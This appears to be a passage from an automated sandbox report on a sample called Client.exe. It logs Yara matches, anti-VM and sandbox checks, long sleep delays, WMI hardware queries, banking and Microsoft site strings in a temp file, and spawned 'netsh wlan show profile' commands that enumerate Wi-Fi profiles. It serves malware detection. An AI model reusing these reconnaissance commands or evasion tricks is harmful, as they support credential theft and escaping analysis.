                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C7E330 pushad ; retf 0_2_05C7EB31
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C7ED92 push es; ret 0_2_05C7EDA0

                                  Boot Survival

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: C:\Users\user\Desktop\Client.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.0.Client.exe.d00000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000000.2108367643.0000000000D02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: Client.exe PID: 6940, type: MEMORYSTR
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                  Source: Client.exeBinary or memory string: SBIEDLL.DLL
                                  Source: C:\Users\user\Desktop\Client.exeMemory allocated: 16B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeMemory allocated: 3070000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599875Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599766Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599641Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599531Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599422Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599313Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599188Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599063Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598953Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598844Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598719Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598485Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598360Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598235Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598110Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597985Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597860Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597735Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597485Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597360Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597235Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597110Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596985Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596860Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596735Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596489Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 595872Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 595688Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeWindow / User API: threadDelayed 2057Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeWindow / User API: threadDelayed 7737Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -600000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599875s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599766s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599641s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599531s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599422s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599313s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599188s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -599063s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598953s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598844s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598719s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598610s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598485s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598360s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598235s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -598110s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597985s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597860s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597735s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597610s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597485s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597360s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597235s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -597110s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -596985s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -596860s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -596735s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -596610s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -596489s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -595872s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -595688s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -100000s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99888s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99765s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99656s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99546s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99437s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99328s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99218s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -99109s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98997s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98875s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98761s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98640s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98531s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98421s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98312s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98203s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -98092s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -97968s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exe TID: 4196Thread sleep time: -97858s >= -30000sJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                  Source: C:\Users\user\Desktop\Client.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                                  Source: C:\Users\user\Desktop\Client.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 600000Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599875Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599766Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599641Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599531Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599422Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599313Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599188Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 599063Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598953Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598844Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598719Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598485Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598360Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598235Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 598110Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597985Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597860Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597735Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597485Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597360Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597235Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 597110Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596985Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596860Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596735Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596610Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 596489Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 595872Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 595688Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 100000Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99888Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99765Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99656Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99546Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99437Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99328Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99218Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 99109Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98997Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98875Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98761Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98640Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98531Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98421Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98312Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98203Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 98092Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 97968Jump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeThread delayed: delay time: 97858Jump to behavior
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: discord.comVMware20,11696487552f
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: global block list test formVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                                  Source: Client.exeBinary or memory string: vmware
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                                  Source: Client.exeBinary or memory string: VMwareVBox
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                                  Source: tmpE197.tmp.dat.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                                  Source: Client.exe, 00000000.00000002.4570056376.00000000055D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllssC:\Windows\system32\svchost.exe
                                  Source: C:\Users\user\Desktop\Client.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeCode function: 0_2_05C70B20 LdrInitializeThunk,0_2_05C70B20
                                  Source: C:\Users\user\Desktop\Client.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeMemory allocated: page read and write | page guardJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                                  Source: C:\Users\user\Desktop\Client.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profileJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior

                                  Language, Device and Operating System Detection

                                  barindex
                                  Source: Yara matchFile source: Client.exe, type: SAMPLE
                                  Source: C:\Users\user\Desktop\Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
